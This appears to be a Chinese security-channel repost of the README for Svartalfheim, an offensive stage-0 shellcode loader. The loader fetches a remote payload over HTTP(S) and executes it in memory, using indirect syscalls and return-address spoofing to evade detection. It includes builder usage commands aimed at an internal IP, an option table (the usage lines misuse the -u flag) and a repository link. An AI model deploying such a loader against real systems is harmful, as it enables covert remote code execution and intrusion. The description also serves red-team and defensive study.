Svartalfheim - 使用间接系统调用和返回地址欺骗下载远程有效负载并在内存中执行的第 0 阶段 Shellcode

科技   2024-12-19 14:31   广东  

第 0 阶段 Shellcode 下载远程有效负载并在内存中执行

Nt API 调用 NtAllocateVirtualMemory 是 NtProtectVirtualMemory 使用间接系统调用进行的。

LoadLibraryA 并且 WinHTTP 调用是通过返回地址欺骗执行的。

用法


OptionDescriptionRequiredDefault Value
-eHttp endpointYes
-uHttp uriYes
-pHttp portYes
-aUser agentNoMozilla/5.0 (Windows NT 10.0; Win64; x64)
-sUse TLSNoEmpty

例子 :

python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 80
python3 builder.py -u 10.10.100.121 -u /path/to/shellcode.bin -p 443 -s

Credit

  • https://github.com/kyleavery/AceLdr

  • https://github.com/realoriginal/titanldr-ng

  • https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html

  • https://github.com/trickster0/TartarusGate


项目地址:

https://github.com/NtDallas/Svartalfheim


感谢您抽出

.

.

来阅读本文

点它,分享点赞在看都在这里

Ots安全
持续发展共享方向:威胁情报、漏洞情报、恶意分析、渗透技术(工具)等,不会回复任何私信,感谢关注。
 最新文章